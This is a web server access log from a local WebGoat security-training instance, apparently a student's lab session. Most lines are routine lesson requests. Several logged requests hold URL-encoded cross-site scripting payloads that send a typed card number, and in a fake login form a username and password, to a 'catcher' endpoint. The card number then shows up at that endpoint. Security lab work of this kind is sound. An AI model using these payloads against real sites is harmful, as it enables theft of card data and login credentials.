0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-1 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-5 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-9 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-10 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:27 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-10 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-4 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-1 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-5 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-9 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-8 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-4 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-1 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:29 -0400] GET /WebGoat/catcher?PROPERTY=yes&stolenCardNum=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-5 17
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-5 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-1 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-5 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-10 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-5 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-5 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-10 18
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-9 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-1 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-8 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-4 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-5 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-10 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-9 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/catcher?PROPERTY=yes&stolenCardNum=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-1 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-7 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-1 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-10 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:32 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-9 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-9 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-9 21
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-10 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-7 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-4 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-1 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-10 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-9 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:13:55 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-10 23
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-5 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-9 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-1 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-10 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:08 -0400] GET /WebGoat/catcher?PROPERTY=yes&stolenCardNum=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-5 30
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-5 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-4 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-10 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-1 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-9 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-10 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&stage=input1=123&input2=456%3CSCRIPT%3E%0A%20%20%20%20XssImage%20%3D%20new%20Image%3B%0A%20%20%20%20XssImage.src%20%3D%20%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22%20%2B%20document.form.input1.value%3B%0A%3C%2FSCRIPT%3E HTTP/1.1 200 2955 http-bio-2210-exec-4 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-1 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-10 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-9 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-4 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/catcher?PROPERTY=yes&stolenCardNum=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-1 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-10 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-5 125
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-8 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-5 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-8 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:14:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-5 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:35 -0400] GET /WebGoat/start.mvc HTTP/1.1 302 - http-bio-2210-exec-1 113
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:35 -0400] GET /WebGoat/login.mvc HTTP/1.1 200 3150 http-bio-2210-exec-3 98
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:37 -0400] POST /WebGoat/j_spring_security_check HTTP/1.1 302 - http-bio-2210-exec-4 41
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:47 -0400] GET /WebGoat/welcome.mvc HTTP/1.1 302 - http-bio-2210-exec-5 10197
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:47 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-6 81
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:47 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-2 220
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/attack?Screen=587846457&menu=5 HTTP/1.1 200 3202 http-bio-2210-exec-8 732
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/attack?Screen=587846457&menu=5 HTTP/1.1 200 3202 http-bio-2210-exec-10 38
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 2948 http-bio-2210-exec-1 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 2952 http-bio-2210-exec-3 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 2618 http-bio-2210-exec-4 42
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-1 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 83 http-bio-2210-exec-10 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 141 http-bio-2210-exec-9 71
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 2948 http-bio-2210-exec-9 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-3 40
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/plugin_extracted/plugin/HowToWork/lessonPlans/en/HowToWork_files/interface.png HTTP/1.1 200 331473 http-bio-2210-exec-4 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 2952 http-bio-2210-exec-5 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 2618 http-bio-2210-exec-1 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 83 http-bio-2210-exec-3 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 141 http-bio-2210-exec-9 29
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-5 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-1 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-7 993
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-1 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-7 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-1 21
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:48 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-7 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-1 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/attack?Screen=659195809&menu=900 HTTP/1.1 200 1292 http-bio-2210-exec-7 64
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 334 http-bio-2210-exec-3 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 1669 http-bio-2210-exec-4 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 500 http-bio-2210-exec-1 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 628 http-bio-2210-exec-2 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 7861 http-bio-2210-exec-6 17
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-4 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 134 http-bio-2210-exec-7 33
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:52 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-3 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:55 -0400] GET /WebGoat/attack?Screen=659195809&menu=900&Username=%3Cform+name%3D%22phish%22%3E+++%3Cbr%3EEnter+Username%3A%3Cbr%3E+++%3Cinput+type%3D%22text%22+id%3D%22ece568_2022s_user%22+name%3D%22username%22%3E%3Cbr%3E+++Enter+Password%3A%3Cbr%3E+++%3Cinput+type%3D%22password%22+id%3D%22ece568_2022s_pw%22+name%3D%22password%22%3E%3Cbr%3E+++%3Cinput+type%3D%22submit%22+name%3D%22login%22+id%3D%22ece568_2022s_submit%22+value%3D%22Login%22+onclick%3D%22hack()%22%3E+++%3Cscript%3E+++++function+hack()+%7B+++++++XssImage+%3D+new+Image%3B+++++++XssImage.src+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%22+%2B+%22%3FPROPERTY%3Dyes%22+%2B+%22%26phishingUsername%3D%22+%2B+document.forms%5B0%5D.username.value++++++++%2B+%22%26phishingPassword%3D%22+%2B+document.forms%5B0%5D.password.value%3B+++++%7D+++%3C%2Fscript%3E++++%3C%2Fform%3E&SUBMIT=Search HTTP/1.1 200 2579 http-bio-2210-exec-5 26
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:55 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 1669 http-bio-2210-exec-2 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:55 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 174 http-bio-2210-exec-1 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:55 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 500 http-bio-2210-exec-7 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:55 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 628 http-bio-2210-exec-4 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:55 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 7861 http-bio-2210-exec-6 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:55 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 134 http-bio-2210-exec-5 33
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:55 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-9 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:23:52:55 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-2 14
